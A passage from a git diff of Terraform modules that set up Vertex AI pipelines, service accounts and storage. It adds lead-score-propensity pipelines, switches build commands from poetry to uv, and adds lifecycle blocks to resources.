+ COUNTER=$((COUNTER + 1)) + done + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "service networking api is not enabled, terraform can not continue!" + exit 1 + fi + sleep 20 + EOT + } + + depends_on = [ + module.project_services + ] +} diff --git a/infrastructure/terraform/modules/pipelines/pipelines.tf b/infrastructure/terraform/modules/pipelines/pipelines.tf index 1c36ef62..0074a536 100644 --- a/infrastructure/terraform/modules/pipelines/pipelines.tf +++ b/infrastructure/terraform/modules/pipelines/pipelines.tf @@ -18,6 +18,14 @@ resource "google_service_account" "service_account" { account_id = local.pipeline_vars.service_account_id display_name = local.pipeline_vars.service_account_id description = "Service Account to run Vertex AI Pipelines" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # Wait for the pipelines service account to be created @@ -53,8 +61,8 @@ resource "google_project_iam_member" "pipelines_sa_roles" { module.project_services, null_resource.check_aiplatform_api, null_resource.wait_for_vertex_pipelines_sa_creation - ] - + ] + project = null_resource.check_aiplatform_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.service_account.email}" @@ -68,9 +76,18 @@ resource "google_project_iam_member" "pipelines_sa_roles" { "roles/artifactregistry.reader", "roles/pubsub.publisher", "roles/dataflow.developer", - "roles/bigquery.connectionUser" + "roles/bigquery.connectionUser", + "roles/compute.networkUser" ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource binds the service account to the required roles in the mds project @@ -79,8 +96,8 @@ resource "google_project_iam_member" "pipelines_sa_mds_project_roles" { module.project_services, null_resource.check_aiplatform_api, null_resource.wait_for_vertex_pipelines_sa_creation - ] - + ] + project = null_resource.check_bigquery_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.service_account.email}" @@ -88,6 +105,14 @@ resource "google_project_iam_member" "pipelines_sa_mds_project_roles" { "roles/bigquery.dataViewer" ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. 
+ lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource creates a service account to run the dataflow jobs @@ -96,6 +121,14 @@ resource "google_service_account" "dataflow_worker_service_account" { account_id = local.dataflow_vars.worker_service_account_id display_name = local.dataflow_vars.worker_service_account_id description = "Service Account to run Dataflow jobs" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # Wait for the dataflow worker service account to be created @@ -130,8 +163,8 @@ resource "google_project_iam_member" "dataflow_worker_sa_roles" { module.project_services, null_resource.check_dataflow_api, null_resource.wait_for_dataflow_worker_sa_creation - ] - + ] + project = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.dataflow_worker_service_account.email}" @@ -142,6 +175,14 @@ resource "google_project_iam_member" "dataflow_worker_sa_roles" { "roles/storage.objectAdmin", ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource binds the service account to the required roles @@ -151,11 +192,19 @@ resource "google_service_account_iam_member" "dataflow_sa_iam" { module.project_services, null_resource.check_dataflow_api, null_resource.wait_for_dataflow_worker_sa_creation - ] - + ] + service_account_id = "projects/${module.project_services.project_id}/serviceAccounts/${google_service_account.dataflow_worker_service_account.email}" role = "roles/iam.serviceAccountUser" member = "serviceAccount:${google_service_account.service_account.email}" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource creates a Cloud Storage Bucket for the pipeline artifacts @@ -167,14 +216,14 @@ resource "google_storage_bucket" "pipelines_bucket" { uniform_bucket_level_access = true # The force_destroy attribute specifies whether the bucket should be forcibly destroyed # even if it contains objects. In this case, it's set to false, which means that the bucket will not be destroyed if it contains objects. - force_destroy = false + force_destroy = false - # The lifecycle block allows you to configure the lifecycle of the bucket. 
- # In this case, the ignore_changes attribute is set to all, which means that Terraform - # will ignore any changes to the bucket's lifecycle configuration. The prevent_destroy attribute is set to false, which means that the bucket can be destroyed. + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. lifecycle { ignore_changes = all - prevent_destroy = false ##true + #prevent_destroy = true + create_before_destroy = true } } @@ -187,14 +236,14 @@ resource "google_storage_bucket" "custom_model_bucket" { uniform_bucket_level_access = true # The force_destroy attribute specifies whether the bucket should be forcibly destroyed # even if it contains objects. In this case, it's set to false, which means that the bucket will not be destroyed if it contains objects. - force_destroy = false + force_destroy = false - # The lifecycle block allows you to configure the lifecycle of the bucket. - # In this case, the ignore_changes attribute is set to all, which means that Terraform - # will ignore any changes to the bucket's lifecycle configuration. The prevent_destroy attribute is set to false, which means that the bucket can be destroyed. + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. lifecycle { ignore_changes = all - prevent_destroy = false ##true + #prevent_destroy = true + create_before_destroy = true } } @@ -246,7 +295,7 @@ resource "google_artifact_registry_repository" "pipelines-repo" { repository_id = local.artifact_registry_vars.pipelines_repo.name description = "Pipelines Repository" # The format is kubeflow pipelines YAML files. - format = "KFP" + format = "KFP" # The lifecycle block of the google_artifact_registry_repository resource defines a precondition that # checks if the specified region is included in the vertex_pipelines_available_locations list. @@ -266,7 +315,7 @@ resource "google_artifact_registry_repository" "pipelines_docker_repo" { repository_id = local.artifact_registry_vars.pipelines_docker_repo.name description = "Docker Images Repository" # The format is Docker images. - format = "DOCKER" + format = "DOCKER" } locals { @@ -308,13 +357,12 @@ resource "null_resource" "build_push_pipelines_components_image" { docker_repo_id = google_artifact_registry_repository.pipelines_docker_repo.id docker_repo_create_time = google_artifact_registry_repository.pipelines_docker_repo.create_time source_content_hash = local.component_image_content_hash - poetry_installed = var.poetry_installed } # The provisioner block specifies the command that will be executed to build and push the base component image. # This command will execute the build-push function in the base_component_image module, which will build and push the base component image to the specified Docker repository. 
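  # A hedged usage note: `var.uv_run_alias` is expected to expand to something like `uv run`,
  # so the effective command resembles
  #   uv run python -m base_component_image.build-push -c <path-to-config>
  # executed from the `python/` working directory; the exact config path is whatever
  # `local.config_file_path_relative_python_run_dir` resolves to for the deployment.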
provisioner "local-exec" { - command = "${var.poetry_run_alias} python -m base_component_image.build-push -c ${local.config_file_path_relative_python_run_dir}" + command = "${var.uv_run_alias} python -m base_component_image.build-push -c ${local.config_file_path_relative_python_run_dir}" working_dir = self.triggers.working_dir } } @@ -350,6 +398,31 @@ resource "null_resource" "check_pipeline_docker_image_pushed" { ## Feature Engineering Pipelines ####### +# This resource is used to compile and upload the Vertex AI pipeline for feature engineering - lead score propensity use case +resource "null_resource" "compile_feature_engineering_lead_score_propensity_pipeline" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + pipelines_repo_id = google_artifact_registry_repository.pipelines-repo.id + pipelines_repo_create_time = google_artifact_registry_repository.pipelines-repo.create_time + source_content_hash = local.pipelines_content_hash + upstream_resource_dependency = null_resource.check_pipeline_docker_image_pushed.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. + # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-lead-score-propensity.execution -o fe_lead_score_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_lead_score_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-lead-score-propensity.execution -i fe_lead_score_propensity.yaml + EOT + working_dir = self.triggers.working_dir + } +} + + # This resource is used to compile and upload the Vertex AI pipeline for feature engineering - auto audience segmentation use case resource "null_resource" "compile_feature_engineering_auto_audience_segmentation_pipeline" { triggers = { @@ -358,7 +431,7 @@ resource "null_resource" "compile_feature_engineering_auto_audience_segmentation pipelines_repo_id = google_artifact_registry_repository.pipelines-repo.id pipelines_repo_create_time = google_artifact_registry_repository.pipelines-repo.create_time source_content_hash = local.pipelines_content_hash - upstream_resource_dependency = null_resource.build_push_pipelines_components_image.id + upstream_resource_dependency = null_resource.compile_feature_engineering_lead_score_propensity_pipeline.id } # The provisioner block specifies the command that will be executed to compile and upload the pipeline. @@ -366,9 +439,9 @@ resource "null_resource" "compile_feature_engineering_auto_audience_segmentation # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -o fe_auto_audience_segmentation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_auto_audience_segmentation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -i fe_auto_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -o fe_auto_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_auto_audience_segmentation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -i fe_auto_audience_segmentation.yaml EOT working_dir = self.triggers.working_dir } @@ -390,9 +463,9 @@ resource "null_resource" "compile_feature_engineering_aggregated_value_based_bid # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -o fe_agg_vbb.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_agg_vbb.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -i fe_agg_vbb.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -o fe_agg_vbb.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_agg_vbb.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -i fe_agg_vbb.yaml EOT working_dir = self.triggers.working_dir } @@ -414,9 +487,9 @@ resource "null_resource" "compile_feature_engineering_audience_segmentation_pipe # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -o fe_audience_segmentation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_audience_segmentation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -i fe_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -o fe_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_audience_segmentation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -i fe_audience_segmentation.yaml EOT working_dir = self.triggers.working_dir } @@ -438,9 +511,9 @@ resource "null_resource" "compile_feature_engineering_purchase_propensity_pipeli # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -o fe_purchase_propensity.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_purchase_propensity.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -i fe_purchase_propensity.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -o fe_purchase_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_purchase_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -i fe_purchase_propensity.yaml EOT working_dir = self.triggers.working_dir } @@ -462,9 +535,9 @@ resource "null_resource" "compile_feature_engineering_churn_propensity_pipeline" # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -o fe_churn_propensity.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_churn_propensity.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -i fe_churn_propensity.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -o fe_churn_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_churn_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -i fe_churn_propensity.yaml EOT working_dir = self.triggers.working_dir } @@ -486,9 +559,9 @@ resource "null_resource" "compile_feature_engineering_customer_lifetime_value_pi # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -o fe_customer_ltv.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_customer_ltv.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -i fe_customer_ltv.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -o fe_customer_ltv.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_customer_ltv.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -i fe_customer_ltv.yaml EOT working_dir = self.triggers.working_dir } @@ -498,12 +571,54 @@ resource "null_resource" "compile_feature_engineering_customer_lifetime_value_pi ## Training and Inference Pipelines ### +# This resource is used to compile and upload the Vertex AI pipeline for training the propensity model - lead score propensity use case +resource "null_resource" "compile_lead_score_propensity_training_pipelines" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + upstream_resource_dependency = null_resource.compile_feature_engineering_customer_lifetime_value_pipeline.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. 
+ # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.training -o lead_score_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f lead_score_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.training -i lead_score_propensity_training.yaml + EOT + working_dir = self.triggers.working_dir + } +} + +# This resource is used to compile and upload the Vertex AI pipeline for prediction using the propensity model - lead score propensity use case +resource "null_resource" "compile_lead_score_propensity_prediction_pipelines" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + upstream_resource_dependency = null_resource.compile_lead_score_propensity_training_pipelines.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. + # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.prediction -o lead_score_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f lead_score_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.prediction -i lead_score_propensity_prediction.yaml + EOT + working_dir = self.triggers.working_dir + } +} + # This resource is used to compile and upload the Vertex AI pipeline for training the propensity model - purchase propensity use case resource "null_resource" "compile_purchase_propensity_training_pipelines" { triggers = { working_dir = "${local.source_root_dir}/python" tag = local.compile_pipelines_tag - upstream_resource_dependency = null_resource.compile_feature_engineering_customer_lifetime_value_pipeline.id + upstream_resource_dependency = null_resource.compile_lead_score_propensity_prediction_pipelines.id } # The provisioner block specifies the command that will be executed to compile and upload the pipeline. @@ -511,9 +626,9 @@ resource "null_resource" "compile_purchase_propensity_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
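  # A hedged note: the scheduler step is expected to create or update the pipeline schedule based
  # on the settings rendered into the config file, so whether this training pipeline runs on a
  # cadence is governed by the purchase_propensity.training.schedule.state value (ACTIVE or PAUSED)
  # supplied through var.pipeline_configuration.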
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -o purchase_propensity_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -i purchase_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -o purchase_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -i purchase_propensity_training.yaml EOT working_dir = self.triggers.working_dir } @@ -532,9 +647,9 @@ resource "null_resource" "compile_purchase_propensity_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -o purchase_propensity_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -i purchase_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -o purchase_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -i purchase_propensity_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -553,9 +668,9 @@ resource "null_resource" "compile_propensity_clv_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -o propensity_clv_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f propensity_clv_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -i propensity_clv_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -o propensity_clv_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f propensity_clv_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -i propensity_clv_training.yaml EOT working_dir = self.triggers.working_dir } @@ -574,9 +689,9 @@ resource "null_resource" "compile_clv_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -o clv_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -i clv_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -o clv_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -i clv_training.yaml EOT working_dir = self.triggers.working_dir } @@ -595,9 +710,9 @@ resource "null_resource" "compile_clv_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -o clv_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -i clv_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -o clv_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -i clv_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -616,9 +731,9 @@ resource "null_resource" "compile_segmentation_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -o segmentation_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -i segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -o segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -i segmentation_training.yaml EOT working_dir = self.triggers.working_dir } @@ -637,9 +752,9 @@ resource "null_resource" "compile_segmentation_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. 
provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -o segmentation_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -i segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -o segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -i segmentation_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -658,9 +773,9 @@ resource "null_resource" 